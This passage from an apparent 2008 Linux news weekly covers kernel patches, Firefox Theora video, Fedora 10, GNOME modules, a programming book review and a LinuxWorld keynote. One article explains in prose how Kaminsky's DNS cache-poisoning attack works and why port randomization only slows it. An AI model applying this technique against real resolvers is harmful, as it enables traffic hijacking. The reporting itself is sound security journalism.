could be circumvented by a rogue program is indeed a problem.  But that is
a very different threat than simply trying to prevent evil attachments from
creating mayhem on Windows boxes; it does not appear to be a threat which
these patches are trying to address.


The lack of a clearly described problem has caused the discussion of these
patches to go around in circles; it is not possible to evaluate
(1) whether the goals of these patches are worth supporting, or
(2) whether the patches can actually be successful in achieving those
goals.  The code, in other words, cannot be reviewed.  Until the TALPA
developers can clarify that situation, their work will look like an example
of "shoot first, then aim."  That kind of code tends not to make it
into the mainline, even if it could be useful in the end.

		Firefox to support Theora video


Video in the browser, at least for Linux, has always resorted to somewhat
clunky solutions—Flash plug-ins or external programs—but that is
likely to change in Firefox 3.1.  Recent commits to the
Firefox development 
tree
have added support for the HTML 5 &lt;video&gt; and &lt;audio&gt; tags as
well as native Ogg Vorbis and Theora support.  Providing multimedia 
support directly in a free browser, with no plug-in required, is a huge step
forward both for Linux and for the royalty-free codecs. 


The battle over video and audio formats is an ugly one, largely because
they are patent minefields.  The "mainstream" formats, MPEG-4 for video and
MP3 for audio, are licensed on a royalty basis to companies that want to
implement playback.  Obviously, Mozilla is not in a position to pay a
per-installation royalty, so that leaves various ad hoc methods using
Javascript and plug-ins—that users have to track down—to make audio-video
playback work in its browser. 


Trying the new feature (seen at left) on one of the recent nightly Firefox
builds seemed 
to work pretty well given that it is still under development.  The video played
smoothly, but the audio was not functional, only producing a rumbling,
clicking soundtrack.  The Wikimedia
Commons video collection was used to test as it is a nice collection of
Theora videos.


Some have seen the lack of Theora content currently on the web as a reason
to downplay
Firefox's support for the format, which is unfortunate, as Mozilla
hacker Robert O'Callahan was quick to point
out.  Unlike the
current situation, once a Firefox with video support is released, there
will be one format that all content producers can be sure will be available
for Firefox.  Depending on whose numbers you believe that means that somewhere
between 10 and 25% of web surfers (or more than 100 million people) will be
using it.   


Even with the dominance of Internet Explorer, the plethora of codec
plug-ins has made it somewhat difficult for content providers to decide
upon which video formats to support.  With a substantial fraction of browsers
supporting a particular free format, that situation may change.  Wikimedia
will certainly help by providing reasons for those not using
Firefox to demand Theora plug-ins—if not integrated Theora
support—for their browsers.  As more content is available in that
format, the pressure will build on Microsoft and Apple.  As we mentioned in an
article on web video formats
last December, 
more content is the key to Theora support.


Some have argued that Vorbis and Theora are just as likely to be
patent-encumbered as the more mainstream codecs, but so far that is
unproven.  There is no licensing authority that claims to have patents
covering those codecs.  Though Mozilla has some depth to its
pockets—largely due to its deal with Google—patent holders
might be loathe to attack a free software browser.  In many ways, patent
holders risk upsetting their entire apple cart if their attacks rise too high
into the public consciousness.  Though, clearly, Mozilla will be taking on
some amount of risk with this move.


There have also been arguments that the Theora codec produces
inferior video compared to those used by MPEG-4 and others.  There is
certainly truth to 
that assertion, but there is ongoing work to bring Theora more in line with
the quality of its competitors.  Due to the fact that it isn't controlled
by a licensing authority with little or no interest in improving it, there is
hope that Theora, or some descendant of it, could produce superior results
some day.


Dirac—also known by the name of
its C language implementation Schrödinger—is another royalty-free codec
that is being looked at for inclusion into Firefox.  There are currently
some performance issues with decoding, but if those get resolved, there
might be two free choices for video codecs in Firefox.


There are lots of entrenched interests that would like to see Theora,
Vorbis, Dirac, and others like them disappear.  They are quite happy with
the current state of affairs.  For the most part, though, users are not.
Even on "well supported" platforms, video—and to a lesser extent
audio—is a confusing jumble of plug-ins and formats that make it
somewhat painful to use.  Flash and Silverlight are supposed to "solve"
these problems, but they do it in a not-quite-free way that still requires
plug-ins.  If web users start
to find it easier to use the video formats embedded in their browser, and
content producers take notice, it
could completely change video on the web.


		Looking forward to Fedora 10


The Fedora 10 alpha release
is now available.  At this point, the next Fedora release (due at the end
of October) should be mostly feature-complete, though the project reserves
the right to continue development work through the beta release (currently
planned for August 19).  So this seems like a good opportunity to have
a look at some of the features which can be expected in Fedora 10.

Rawhide users, who are well known for their masochistic tendencies, are
already running the 2.6.27-rc kernels.  Given that 2.6.27 should come out
in the early part of October, chances are good that this is the kernel
version which will come standard with Fedora 10.  So Fedora users will
be among the first to get enhanced webcam support, UBIFS, ftrace,
multiqueue networking, and more.

Improved webcam support is an explicit goal for Fedora 10 in general.  The
kernel upgrade will help a lot in that regard, but Fedora is taking aim at
another longstanding problem: quite a few video applications still use the
Video4Linux1 API, despite the fact that said API has been deprecated for
years.  To help improve this situation, Hans de Goede has been working on
another long-missing piece: a
user-space library to make the Video4Linux2
API easier for applications to use.  It will handle things like format
conversions, which, by policy, are not allowed in the kernel; it also does
better impedance matching between the V4L1 and V4L2 interfaces.  The end
result of this work will be better-working webcams for Fedora users - and
for everybody else.

A similar objective for Fedora 10 is better support for remote controls.
The LIRC remote control package has
always been a some-assembly-required affair; Fedora developers are trying
to improve this situation and get remote controls to just work.

"Just works," alas, is not a phrase which has been heard often enough
around the PulseAudio sound server.  The upcoming Fedora release will have
a seriously rewritten PulseAudio; the biggest change is a shift to
timer-based audio scheduling instead of the older interrupt-driven
technique.  The promised result will be glitch-free audio; those who are
curious about the details of how this will work can find them on this
page.  PulseAudio is getting better.

Another big change, of course, is the shift to RPM 4.6 - the first real
update to the RPM package manager in many years.  Being fully aware of the
consequences of 
a failed RPM upgrade, the Fedora developers are proceeding with great
caution.  The on-disk format will not be changed anytime soon, and newer
RPM features are not, yet, being used in Fedora; that means that they can
revert back to the older RPM if need be without leaving systems stranded.
After some early glitches, RPM 4.6 would appear to be working fairly well,
though, so this upgrade will probably stick.

Beyond that, Fedora users can expect a long list of new goodies.
NetworkManager now has a feature allowing the sharing of network
connections via wireless.  There are plans to provide much-improved support
of the Haskell programming language, though that project appears to be
moving slowly.  And there is an interesting new security audit tool intended to
look for security problems and signs of intrusions.  Your editor would have
loved to try out this tool, but, as of this writing, the version in Rawhide
appears to be lacking some fundamental features - like being able to start
up successfully.  Stay tuned.

One thing that apparently will not be in Fedora 10, despite the occasional
user request, is KDE 3.5.  Some KDE
users are not, yet, happy with the state of development of KDE 4 and
would like to have their old, familiar desktop back.  This note from Fedora leader Paul Frields
explains why KDE 3.5 will not be returning to Fedora.  In summary:
Fedora exists to push the leading edge, QT3 is no longer maintained, and
shipping KDE 4 helps that platform improve more quickly.  So
KDE 3.5 will not be coming back - unless somebody else goes to the
trouble of packaging and maintaining it.


All told, there is a lot of work going into this distribution release.  The
best way to really see what's going on - and to help the process - is, of
course, to try out the alpha release and report any problems which
result.  After making good backups, of course.

		The GNOME 2.24 module proposals


The GNOME desktop environment
is built in a modular manner with API-stable
platform modules and less API-stable
desktop modules.
Desktop modules can be transitioned to platform modules as they mature.
The Damned Lies about GNOME
translation site describes the GNOME modules:
"Modules are separate libraries or applications, with one or more branches of development included. They are usually taken from CVS, and we keep all relevant information on them (Bugzilla details, web page, maintainer information,...)."  The site contains an extensive
list of modules
for the current GNOME 2.22 release.


On August 4, 2008, 
list of modules to be included 
in the upcoming GNOME 2.24 was posted.
A quick tour of the new modules to be included follows:


empathy:
"Empathy consists of a rich set of reusable instant messaging widgets, and a GNOME client using those widgets. It uses Telepathy and Nokia's Mission Control, and reuses Gossip's UI. The main goal is to permit desktop integration by providing libempathy and libempathy-gtk libraries. libempathy-gtk is a set of powerful widgets that can be embeded into any GNOME application."


 project hamster:
"Project Hamster is time tracking for masses. It helps you to keep track [of] how much time you have spent during the day on activities you have set up.
Whenever you change from doing one task to other, you change your current activity in Hamster. After a while you can see some statistics of how many hours you have spent on what. Maybe print it out, or export to some suitable format, if time reporting is a request of your employee."


 clutter:
"Clutter is an open source software library for creating fast, visually rich and animated graphical user interfaces.
Clutter uses OpenGL (and optionally OpenGL ES for use on Mobile and embedded platforms) for rendering but with an API which hides the underlying GL complexity from the developer."


 libcanberra, announced

here, is a lightweight sound event library that implements the XDG
sound theming/naming specs. 


 PolicyKit
(from an LWN article):
"Mounting removable filesystems, CDs, USB devices, and the like, is a
classic example of a root-only task that some non-privileged users might be
allowed to perform. In the past, various mechanisms using groups or mount
options in /etc/fstab have been used with some success, but the mechanisms
were specific to mounting and did not provide the flexibility that some
administrators would like. Network configuration - particularly for
wireless networking - is another common task that users might be allowed to
do.
PolicyKit is an attempt to centralize these kinds of decisions into a
single policy file that the administrator can use to set the kinds of
access regular users should be allowed." 


There's also a few modules which were not accepted this time around:


 Conduit:
"Conduit is a synchronization application for GNOME. It allows you to synchronize your files, photos, emails, contacts, notes, calendar data and any other type of personal information and synchronize that data with another computer, an online service, or even another electronic device.
Conduit manages the synchronization and conversion of data into other formats."
Conduit was partially rejected due to an incomplete UI, but allowed as an
external dependency for use by other applications.
It should be ready for inclusion in GNOME 2.26.


 WebKit:
"WebKit is an open source web browser engine. WebKit is also the name of the Mac OS X system framework version of the engine that's used by Safari, Dashboard, Mail, and many other OS X applications. WebKit's HTML and JavaScript code began as a branch of the KHTML and KJS libraries from KDE."
The plan is to replace the
Gecko
html rendering engine with Webkit in time for GNOME 2.26.


 libgda (part of Gnome-DB):
"Libgda is a database abstraction layer which hides all the database backend specifics from the user, offering a simple interface to each supported database (MySQL, PostgreSQL and SQLite are fully functional while Oracle and MDB are useable and missing features) to run queries."
Libgda is required by the
Anjuta IDE, it will either
be included optionally or bundled with Anjuta.


There is, of course, a lot more to GNOME 2.24 than a few new modules; see
the roadmap for more
information.  This GNOME release is currently scheduled for
September 24.

		Kernel Hacker's Bookshelf: The Practice of Programming


In
The
Mythical Man-Month, Fred Brooks observes that the productivity of
experienced programmers frequently varies by a factor of 10 or more.
What makes the 10x programmers so much better?  Undoubtedly some of
the difference is due to native facility with language or logic.  But
even with these advantages, no one is born writing beautiful, elegant,
maintainable code; everyone goes through a learning process.


How do we learn to be good programmers?  In many ways, the art of
computer programming is still stuck in the era of the
master-apprentice system.  Some of us are lucky enough to learn to
program in something like
"the
UNIX room" at Bell Labs, where you could shoulder-surf the likes
of Ken Thompson and Dennis Ritchie.  Occasionally someone practices
pair-programming instead of just arguing passionately about it, and
once in a very long while, a 10x programmer will actually teach
another person how to program.  Unfortunately, formal university
education rarely teaches students about the practical aspects of
programming, as any holder of a computer science degree will readily
attest, and few programmers have the time, interest, or ability to
write accessible books about programming.  As a result, most
programmers are doomed to a decade of re-inventing wheels by trial and
error.


Brian Kernighan and Rob Pike are two 10x programmers who do have the
time, interest, and ability to write a book about software engineering
best practices.
The
Practice of Programming aims to fill the gaps in the training of
most computer programmers.  From the book: 


Topics like
testing, debugging, portability, performance, design alternatives, and
style - the practice of programming - are not usually the focus of
computer science or programming courses.  Most programmers learn them
haphazardly as their experience grows, and a few never learn them at
all.


  This book probably won't make you ten times more productive,
but it can easily make you twice as productive (and half as
frustrated).  If I could send one book to a programmer trapped on a
desert island, this would be the book - and I'd send the same book to
the new programmer who just joined my development team.

Overview

The Practice of Programming differs from most programming books in
several enjoyable ways.  Rather than promoting a particular new
programming philosophy, Kernighan and Pike focus on three principles:
simplicity, clarity, and generality.  As you might guess from the
title, the book is short on theory and long on practice.  About one
third of the ~250 page book is taken up by actual real-world example
code, starting with the original dodgy code and showing the
step-by-step evolution to better code.  Most examples are in C, but
the principles illustrated readily translate to other languages.


The writing style of this book is refreshingly practical and
down-to-earth, without losing generality.  The authors avoid stark
black-and-white pronouncements, preferring to discuss why different
techniques are useful under different conditions.  Clarity is another
hallmark of their style; they use as few words as possible to clearly
state each point, and dismiss trivialities and side issues quickly and
cleanly.  A typical example of this approach is their advice on brace
and indentation style: "The specific style is less important than its
consistent application.  Pick one style, preferably ours, use it
consistently, and don't waste time arguing."


The book is organized into nine chapters, each covering a topic such
as testing or debugging that usually requires an entire book on its
own.  The table of contents includes headings like "Test as You Write
the Code," "Consistency and Idioms," "Strategies for Speed," "Other
People's Bugs," and "Programs that Write Programs."  I can't cover the
whole book in this review, but I'll go into detail on two of my
favorite chapters, "Performance" and "Notation."

Performance

The introduction of this chapter gives some very direct advice: "The
first principle of optimization is don't."  Computers
are fast - go run
lmbench on your desktop
to update your sense of just how fast.  For example, some system calls
are now in the sub-microsecond range under Linux on modern hardware.
Armchair optimization - the practice of making small theoretical
optimizations as you code, at the expense of readability, portability,
or correctness - is especially foolish in light of Donald Knuth's
observation that 4% of the code typically accounts for more than half
of the run-time of the program.  Kernighan and Pike's first piece of
advice is to write simple, clear, concise code, and optimize only when
you have some tangible reason to do so.


The chapter begins with a real-world optimization problem: a
spam-filter that worked well enough in testing but bogged down in
production.  The tangible reason for optimizing this program is that
the mail queues were filling up with undelivered mail - a clear
justification for optimization if there ever was one.  The authors
show the process they went through to optimize the spam-filter,
step-by-step: profiling, analysis, a first attempt at optimization,
re-factoring the problem, addition of pre-computation, and measurement
of the results.  This overview is welcome not only as a good
programming war story but also because the overall flow of code
optimization is non-obvious (otherwise, "How would you go about
optimizing a program?" would not be such a common interview question).


The rest of the chapter talks about best practices for each step of
optimization.  The first topic is timing and profiling, as it should
be.  All too often, even good programmers measure performance by
"feel" - if you don't believe me, search LKML.  Sometimes no easy tool
exists to measure what is being optimized, but it's still better to
write some kind of measurement tool, no matter how clunky or
approximate.  Human perception and judgment are heavily influenced by
preconceptions and the vast majority of theoretical optimizations have
negligible effects on performance.  A more subtle piece of advice is
to turn performance results into pictures or graphs.  Chris
Mason's seekwatcher
is an excellent example; it turns block traces into graphs - and even
movies!


The authors cram a surprisingly complete demonstration of profiling
into less than two pages, using prof on their spam-filter as
the example.  They show how to identify hot spots and do basic sanity
checking on the results - e.g., match up the number of times a
function call shows up in the profile with the number of iterations of
the main loop.  While they include some caveats on trusting profiling
results, I wish they had spent some time on the design of profiling
tools to show the kinds of biases and errors that so often make
profiling results misleading.  Perhaps it's because I work on systems
software, but I've found that I really have to know the details of
whether the profiler is using a periodic timer, hardware counters,
includes time spent sleeping for IO in the kernel, how many events are
dropped or missed, etc.  A useful technique to demonstrate, and one in
keeping with their minimalist, do-it-yourself philosophy, would be
manually bisecting the code with timers to find hot spots when normal
profiling tools fail.


The discussion on rewriting code goes beyond "find the top function
and optimize it" - it also addresses eliminating calls to hot
functions entirely and doing modest amounts of pre-computation.  A
fair portion of the section on code tuning has been superseded by
improved compilers which can do, e.g., loop-unrolling automatically,
but it still teaches valuable lessons about how to read code and
understand its true cost and complexity.

Notation

The chapter on notation unfolds elegant, beautiful solutions one by
one, turning normally painful problems into fun coding exercises.
Each technique - little languages, special-purpose notation,
programs that write programs, virtual machines - is accompanied by a
concrete demonstration of how to implement the bare minimum of the
technique to get the job done.  The suggestion to "write a new
language" seems absurd in the face of most day-to-day programming
problems, but writing a very small, very specialized language can save
the programmer much time and many bugs, even when replacing only a few
hundred lines of conventional code.  Their first example,
after printf() format specifiers, is a notation for packing
and unpacking network packets.  I recently implemented this technique
and can report that it worked beautifully, repaying the time I
invested in it within days of completion.


Another exercise in minimalism is their demonstration of how to write
a basic grep in around 100 lines of C, without relying on
external libraries.  Most of us will never need to re-implement
regular expressions from scratch, but we may encounter a problem best
solved by writing a small general purpose pattern matcher.


Another example demonstrates the power (and danger) of keeping a
variety of scripting languages and data processing tools at your
fingertips.  The authors implement a crude text-only web browser with
about 50 lines of Awk, Tcl, and Perl, again using only built-in
language support and no external libraries or modules.  Here as
elsewhere, Kernighan and Pike refuse to make hard and fast assertions
about the One True Scripting Language; they'd rather you used the
right language for the right job.  From the book: 


These languages
together are more powerful than any one of them in isolation.  It's
worth breaking the job into pieces if it enables you to profit from
the right notation.


It can be argued that this approach is less
justified now, given the modern plethora of scripting languages
written specifically to address the limitations of earlier scripting
languages.  However, their argument still rings true for me, as
someone who has never settled down into one scripting language.  I
have a decade of experience using a hodge-podge of random scripting
languages, and when I do write in one scripting language, I end up
spending a lot of time contorting language features to fit situations
they were not designed for.


The section on virtual machines shows how to implement a minimal
special purpose virtual machine
(the Z-machine
for Zork comes to mind
immediately).  The remaining sections cover programs that write
programs, using macros to generate code (a common technique in Linux
header files), and just a little taste of run-time code generation.

Summary

The
Practice of Programming embodies its own principles: simplicity,
clarity, generality.  First published in 1999, it has aged well due to
its focus on general principles of good programming rather than
language-specific tricks and tips.  The book has something to offer to
programmers at all levels of experience; beginners will benefit most
but experienced developers will appreciate the more advanced and
subtle techniques in the later chapters.  Of all the books on the
Kernel Hacker's Bookshelf, this one should never be missing.


		Kernel-based checkpoint and restart


Your editor, who has carefully hidden several years of experience in 
Fortran-based scientific programming from this readership, encountered
checkpoint and restart facilities a long time ago.  In those days, programs
which would run for days of hard-won CPU time on an unimaginably fast CDC
or Cray mainframe would occasionally checkpoint themselves, minimizing the
amount of compute time lost when (not if) the system went down at an
inopportune time.  It was a sort of insurance policy, with the premiums
being paid in the form of regular checkpoint calls.

Central processor time is no longer in such short supply, but there is
still interest in the ability to checkpoint a running application and
restore its state at some future time.  One obvious application of this
capability is to restore the application on a different machine; in this
way, running applications can be moved from one host to another.  If the
"application" is an entire container full of tasks, you now have the
ability to shift those containers around without the contained tasks even
being aware of what is going on.  That, in turn, can provide for load
balancing, or just the ability to move containers off a machine which is
being taken down.


Linux does not have this capability now.  Anybody who thinks about adding
it must certainly find the prospect daunting; applications have a
lot of state hidden throughout the system.  This state includes open
files (and positions within the files), network sockets and pipes connected
to remote peers, signal states, outstanding timers, special-purpose file
descriptors (for epoll_wait(), for example), ptrace()
status, CPU affinities, SYSV semaphores, futexes, SELinux state, and much
more.  Any 
failure to save and properly restore all of that state will result in a
broken process.  It is no wonder that Linux does not do checkpoint and
restart; most rational developers would be driven away by the complexities
involved in making it work in an even remotely robust manner.


But, then, there was a time when rational programmers would not have
attempted the creation of Linux in the first place.  So it should not be
surprising to see that developers are working on the checkpoint and restart
problem.  The latest attempt can be seen in this patch set posted by Dave
Hansen (but originally written by Oren Laadan).  It is far from being ready
for prime-time use, but it does show the sort of approach which is being
taken.


For some time, the prevailing wisdom was that checkpoint and restart should
be pushed as much into user space as possible.  A user-space process could
handle the marshaling of process state and writing it to a file; the
kernel would only get involved when it was strictly necessary.  It turns
out, though, that this involvement is required fairly often, requiring the
addition of "lots of new, little kernel interfaces" to make everything
work.  So, at a meeting at OLS, the checkpoint/restart developers decided
to take a different approach and move the work into the kernel.  The result
is the creation of just two new system calls:


A call to checkpoint() will write an image of the current process
to the given fd.  The pid argument identifies the init
process for the current process's container; it is saved to the image but
not otherwise used in the current patch.  If the operation succeeds, the
return value will be a unique (until the system reboots) "checkpoint image
identifier".  
restart() reverses the process; crid is the image
identifier, which is not currently used.  The flags argument is
currently unused in both system calls.
These interfaces seem likely to change; future enhancements to the
interface are likely to include capabilities like checkpointing other
processes and groups of processes.


The CAP_SYS_ADMIN capability is currently required for both
checkpoint() and restart().  That is somewhat
unfortunate, in that it would be nice if ordinary, unprivileged processes
were able to checkpoint and restart themselves.  There are some real
security implications which must be kept in mind, though, especially when
one considers the sort of damage that could result from an attempt to
restart a carefully-manipulated checkpoint image.  Making
restart() secure for unprivileged use will not be a job for the
faint of heart.


At this stage of development, the patch does not even attempt to solve the
entire problem.  It is able to save the current state of virtual memory
(but only in the absence of non-private, shared mappings), current
processor state, and the contents of the task structure.  That is enough to
checkpoint and restart a "hello, world" program, but not a whole lot more.
But that is a reasonable place to start.  Given the complexity of the
problem, proceeding in careful baby steps seems like the right way to go.
So we're probably not going to have a working checkpoint facility in the
kernel in the near future, but, with luck and patience, we'll eventually
have something that works.

		Moving the Data Center, a LinuxWorld Keynote from Kevin Clark


Last week your author was in San Francisco attending LinuxWorld 2008.  One
keynote was from Kevin Clark, Director of IT Operations at Lucasfilm.
Lucasfilm is the production company that brought us Star Wars, Indiana
Jones and many other movies and related merchandise.  As the Director of
IT Operations, Kevin is responsible for the IT needs of four separate
divisions in five locations.  In 2005 the main data center was moved to
a new facility; Kevin talked about the challenges and lessons learned in
the process of moving a high availability data center, while making three
movies and maintaining high security.

The four divisions of Lucasfilm all have different needs; to meet those
needs, the data center has machines running Linux, Unix, Windows and few
Macs.  Industrial Light and Magic (ILM) is the biggest user of Linux.  This
is the division that does the special effects for Lucasfilm and many other
movies such as Disney's "Pirates of the Caribbean" series.  Lucas Arts,
Lucas Licensing and Lucas Animation are the other three.  These three
divisions handle the production of movie-based video games, action figures,
official web sites, animated films and other related endeavors.

When Hollywood producers want special effects, they want something that
hasn't been seen before, something amazing.  With each new movie the
producer strives to out-do other movies.  ILM must be on the bleeding edge
of special effects technology, while maintaining high availability and high
security.  ILM Linux clusters run around the clock, producing "some of the
best special effects the industry has to offer."  Downtime is not an
option, even for a major move.

Kevin's talk was about moving the data center, and not particularly about
Linux.  He did have some nice, short films showing off some of ILM's work.
Did you know that Pirates of the Caribbean was not filmed on a ship at
sea?  It's just rendered that way.

For the new data center, Kevin knew he wanted to consolidate systems such
as email, databases, storage and backup/recovery.  He knew he needed
flexible power and cooling requirements and a flexible distribution design
with lots of storage for the rendering clusters and the backups and also
web hosting for movie sites and other related businesses.  The center has
high bandwidth requirements, both internally and externally.  Also, there
are always many people trying to get the scoop on the latest movies and
games, so high security is paramount.  He chose technologies from AMD,
Foundry, NetApp, HP and Juniper to accomplish his goals.

The new data center has over 700 miles of fiber and over 2000 miles of
copper with a global WAN for sites at the Telco depot, Letterman Digital
Arts Center, Skywalker Ranch, Big Rock Ranch and Singapore Animation.
There are 400 terabytes of storage.  The AMD blades have 32 gigabytes of
memory and they stack them 66 blades per rack.  There are lots of racks and
floor to ceiling airflow cools them.  When filming, all shots are archived,
so there is high volume at all times and complete disaster recovery is
required.

Kevin had a few lessons that he learned from the data center move: DC power
has limitations, equipment interoperability is key and should be built to
scale following a network design.  The center has needs outside of IT to
consider.  All the pieces must be fully redundant.  You always think that
it is fully redundant until it fails.  Power and cooling requirements must
be balanced.  Run the computers hotter to save power, but not so hot that
they fail.  The data center is a continually moving target with constant
pressure to be more energy efficient.  More virtualization could
help. Getting light to move faster would help.

We were left to wonder how one might overcome the limitations of DC power,
or how to get light to move faster.  Those points did get a laugh from the
audience though.  All in all, one might wish for something more Linux
related at LinuxWorld, but it was an entertaining presentation.

		Details of the DNS flaw revealed


Dan Kaminsky spoke to a packed house at Black Hat on 6 August to outline
the fundamental flaw he found in the Domain Name System (DNS).  Contrary to
his hopes, though, the flaw was discovered and publicized before his 
presentation.  The vulnerability is interesting in its own right, but the
implications of what can be done with it are staggering.  In addition, the
"fix" has well understood shortcomings that can still potentially be
exploited to poison DNS caches.

 
We reported on the
vulnerability in early July, including Kaminsky's request that security
folks not publicly speculate about the flaw.  As one might guess, that
request was largely ignored.  When security researcher Halvar Flake published
his speculation, another researcher, who was known to have the details
of the flaw, publicly
confirmed it, but just as quickly removed the confirmation.  While it
sounds a bit like a security 
community soap opera, it was fairly clearly caused by the attempt to
contain the vulnerability information.


An important part of DNS is the ability to delegate to another nameserver.
When looking up example.net, first one of the root nameservers is
consulted; it does not know the answer so it delegates to one of the
nameservers that handles .net addresses.  The delegation response
includes the names of the servers being delegated to, but also helpfully
includes the IP 
address of those servers as well.  It is this helpful addition, which is
meant to reduce DNS traffic, that can be exploited.


The key to DNS cache poisoning is that the first good answer wins.
If an attacker can send a packet with all of the proper information, but
with his own IP address substituted for the correct one, and that packet
reaches the querying server first, the attacker wins.  In order for that to
happen, the attacker needs to arrange or know that the victim will be
making a particular query as well as be able to create a response that will
be considered "good".


Each DNS query has a 16-bit transaction ID; early implementations just had
an incrementing counter, but since that time random transaction IDs have
been used.  In order for a DNS response to be accepted, it must have the
same transaction ID as the request.
Just over a year ago, we wrote about a cache poisoning
vulnerability in BIND that was caused by a predictable random number
generator.  When an attacker can narrow down the possible values for
transaction IDs, it reduces the number of responses they must generate
commensurately. 


Absent any method to predict transaction IDs, an attacker must send 32K
responses on average before 
the correct response arrives—which is difficult, at best, to do.  If
the attacker can cause the victim to make multiple requests, though, they
can increase their chances.  Because DNS servers cache the results of their
queries, repeated requests for the same host information will not generate
additional lookups.


Kaminsky observed that if you make the victim request information about
multiple, probably non-existent names in a domain, it will have to make a
request to the nameserver responsible for that domain multiple times.  If
the victim queries for foo1.example.net,
foo2.example.net, etc., 
it will use a different, random transaction ID for each request.  The
attacker can flood the victim with packets purporting to delegate the
request to another server, ns.example.net say, but include an IP
address under its control as the IP for that server.


The net result is that if one of the attacker's responses gets accepted,
because it finally guessed the right transaction ID, the victim's
nameserver cache has been poisoned.  The attacker can control all lookups
in the entire example.net domain because it has substituted its own
server as the nameserver for that domain.  Because of the birthday paradox,
the attacker does not need to generate anywhere near 32K responses to have
a high probability of having one with a correct transaction ID.  In his
testing, Kaminsky found 
that he could poison a cache like this in less than 10 seconds.


This technique works all the way up the hierarchy of DNS servers,
potentially allowing top-level-domain or root nameservers to be poisoned.
It is clearly a very serious flaw that can be exploited in a huge
number of ways.  Kaminsky's Black Hat slides
[Powerpoint format, but viewable in OpenOffice], detail many different 
implications and are well worth a read.  Also,
for an excellent description of how DNS works as well as more details on
the flaw Kaminsky found, see Steve
Friedl's illustrated guide.


The "fix" that was rolled out in a coordinated fashion by
many different vendors is to randomize the source UDP port for each
query.  This is a technique that was implemented years ago in Daniel
Bernstein's djbdns and has been recommended by various cache poisoning
researchers (notably Amit Klein) for some time.  By doing this, an attacker
must also guess the proper UDP port to send the response to, which can
provide up to an additional 16 bits of randomness to the query.  In the
best case, where all possible UDP source ports are used, 
that increases the number of possible responses from 64K to over 4 billion. 


That seems like it would take the attack out of the realm of possibility,
but that clearly isn't the case.  Kaminsky and the vendors all knew that
adding source port randomization only made it harder—not impossible.
Linux kernel hacker Evgeniy Polyakov has done some experiments with the
patched version of BIND on a gigabit ethernet LAN, finding that he
could poison a 
cache in under ten hours. As he points out: "So, if you have a GigE
lan, any trojaned machine can poison your DNS during one night." 


Other solutions are actively being sought, but it is a difficult problem
because backward compatibility with countless DNS installations needs to
be maintained.  As always when a DNS problem is publicized, DNSSEC is
touted as the solution.  There are numerous technical and political
problems that have stood in the way of DNSSEC adoption; those
seem unlikely to just disappear.  


This DNS flaw is serious, but there are
plenty of serious internet security issues as Kaminsky points out in his blog:


Even if we go from 32 bits of entropy to 128 bits — even if we deploy
DNSSec — we're still going to deliver email insecurely.  We're still
going to have an almost entirely unauthenticated web.  We're still going to
ignore SSL certificate errors, and we're still going to have application
after application that can't autoupdate securely. 

That, at the end of the day, is a far larger problem than this particular
DNS issue.


While there may be bigger problems in our internet infrastructure, there
are few things that are as pervasive as DNS.  Kaminsky points out a number
of non-obvious places where it is used—and could be abused—such
as mailer lookups of HELO strings to try and decide whether to accept email
or web servers 
doing reverse lookups for logfile messages.  It is a little surprising that
something so integral had such an obvious, in retrospect, flaw in its
design that went undetected for around 25 years.  It makes
one wonder what else is lurking out there.

		Block layer discard requests


Solid-state, flash-based storage devices are getting larger and cheaper, to
the point that they are starting to displace rotating disks in an
increasing number of systems.  While flash requires less power, makes less
noise, and is faster (for random reads, at least), it has some peculiar
quirks of its own.  One of those is the need for wear leveling - trying to
keep the number of erase/write cycles on each block about the same to avoid
wearing out the device prematurely.

Wear leveling forces the creation of an indirection layer mapping logical
block numbers (as seen by the computer) to physical blocks on the media.
Sometimes this mapping is done in a translation layer within the flash
device itself; it can also be done within the kernel (in the UBI layer, for example) if the
kernel has direct access to the flash array.  Either way, this remapping
comes into play anytime a block is written to the device; when that
happens, a new block is chosen from a list of free blocks and the data is
written there.  The block which previously contained the data is then added
to the free list.

If the device fills up with data, that list of free blocks can get quite
short, making it difficult to deal with writes and compromising the wear
leveling algorithm.  This problem is compounded by the fact that the
low-level device does not really know which blocks contain useful data.
You may have deleted the several hundred pieces of spam backscatter from
your mailbox this morning, but the flash mapping layer has no way of
knowing that, so it carefully preserves that data while scrambling for free
blocks to accommodate today's backscatter.  It would be nice if the
filesystem layer, which knows when the contents of files are no longer
wanted, could communicate this information to the storage layer.

At the lower levels, groups like the T13
committee (which manages the ATA standards) have created protocol
extensions to allow the host computer to indicate that certain sectors are
no longer in use; T13 calls its new command "trim."  Upon receipt of a trim
command, an ATA device can immediately add the indicated sectors to its
free list, discarding any data stored there.  Filesystems, in turn, can
cause these commands to be issued whenever a file is deleted (or
truncated).  That will allow the storage device to make full use of the
space which is truly free, making the whole thing work better.

What Linux lacks now, though, is the ability for filesystems to tell
low-level block drivers about unneeded sectors.  David Woodhouse has posted
a proposal to fill that gap in the form of the discard requests patch set.  As
one might expect, the patches are relatively simple - there's not much to
communicate - though some subtleties remain.

At the block layer, there is a new request function which can be called by
filesystems:


This call will enqueue a request to bdev, saying that
nr_sects sectors starting at the given sector are no
longer needed and can be discarded.  If the low-level block driver is
unable to handle discard requests, -EOPNOTSUPP will be returned.
Otherwise, the request goes onto the queue, and the end_io()
function will be called when the discard request completes.  Most of the
time, though, the filesystem will not really care about completion - it's
just passing advice to the driver, after all - so end_io() can be
NULL and the right thing will happen.

At the driver level, a new function to set up discard requests must be
provided:


To support discard requests, the driver should use
blk_queue_set_discard() to register its
prepare_discard_fn().  That function, in turn, will be called
whenever a discard request is enqueued; it should do whatever setup work is
needed to execute this request when it gets to the head of the queue.

Since discard requests go through the queue with all other block requests,
they can be manipulated by the I/O scheduler code.  In particular, they can
be merged, reducing the total number of requests and, perhaps, pulling
together enough sectors to free a full erase block.  There is a danger
here, though: the filesystem may well discard a set of sectors, then write
new data to them once they are allocated to a new file.  It would be a
serious mistake to reorder the new writes ahead of the discard operation,
causing the newly-written data to be lost.  So discard operations will need
to function as a sort of I/O barrier, preventing the reordering of writes
before and after the discard.  There may be an option to drop the barrier
behavior, though, for filesystems which are able to perform their own
request ordering.


Outside of filesystems, there may occasionally be a need for other programs
to be able to issue discard requests; David's example is mkfs,
which could discard the entire contents of the device before making a new
filesystem.  For these applications, there is a new ioctl() call
(BLKDISCARD) which creates a discard request.  Needless to say,
applications using this feature should be rare and very carefully written. 


David's patch includes tweaks for a number of filesystems, enabling them to
issue discard requests when appropriate.  Some of the low-level flash
drivers have been updated as well.  What's missing at this point is a fix
to the generic ATA driver; this will be needed to make discard requests
work with flash devices using built-in translation layers - which is most
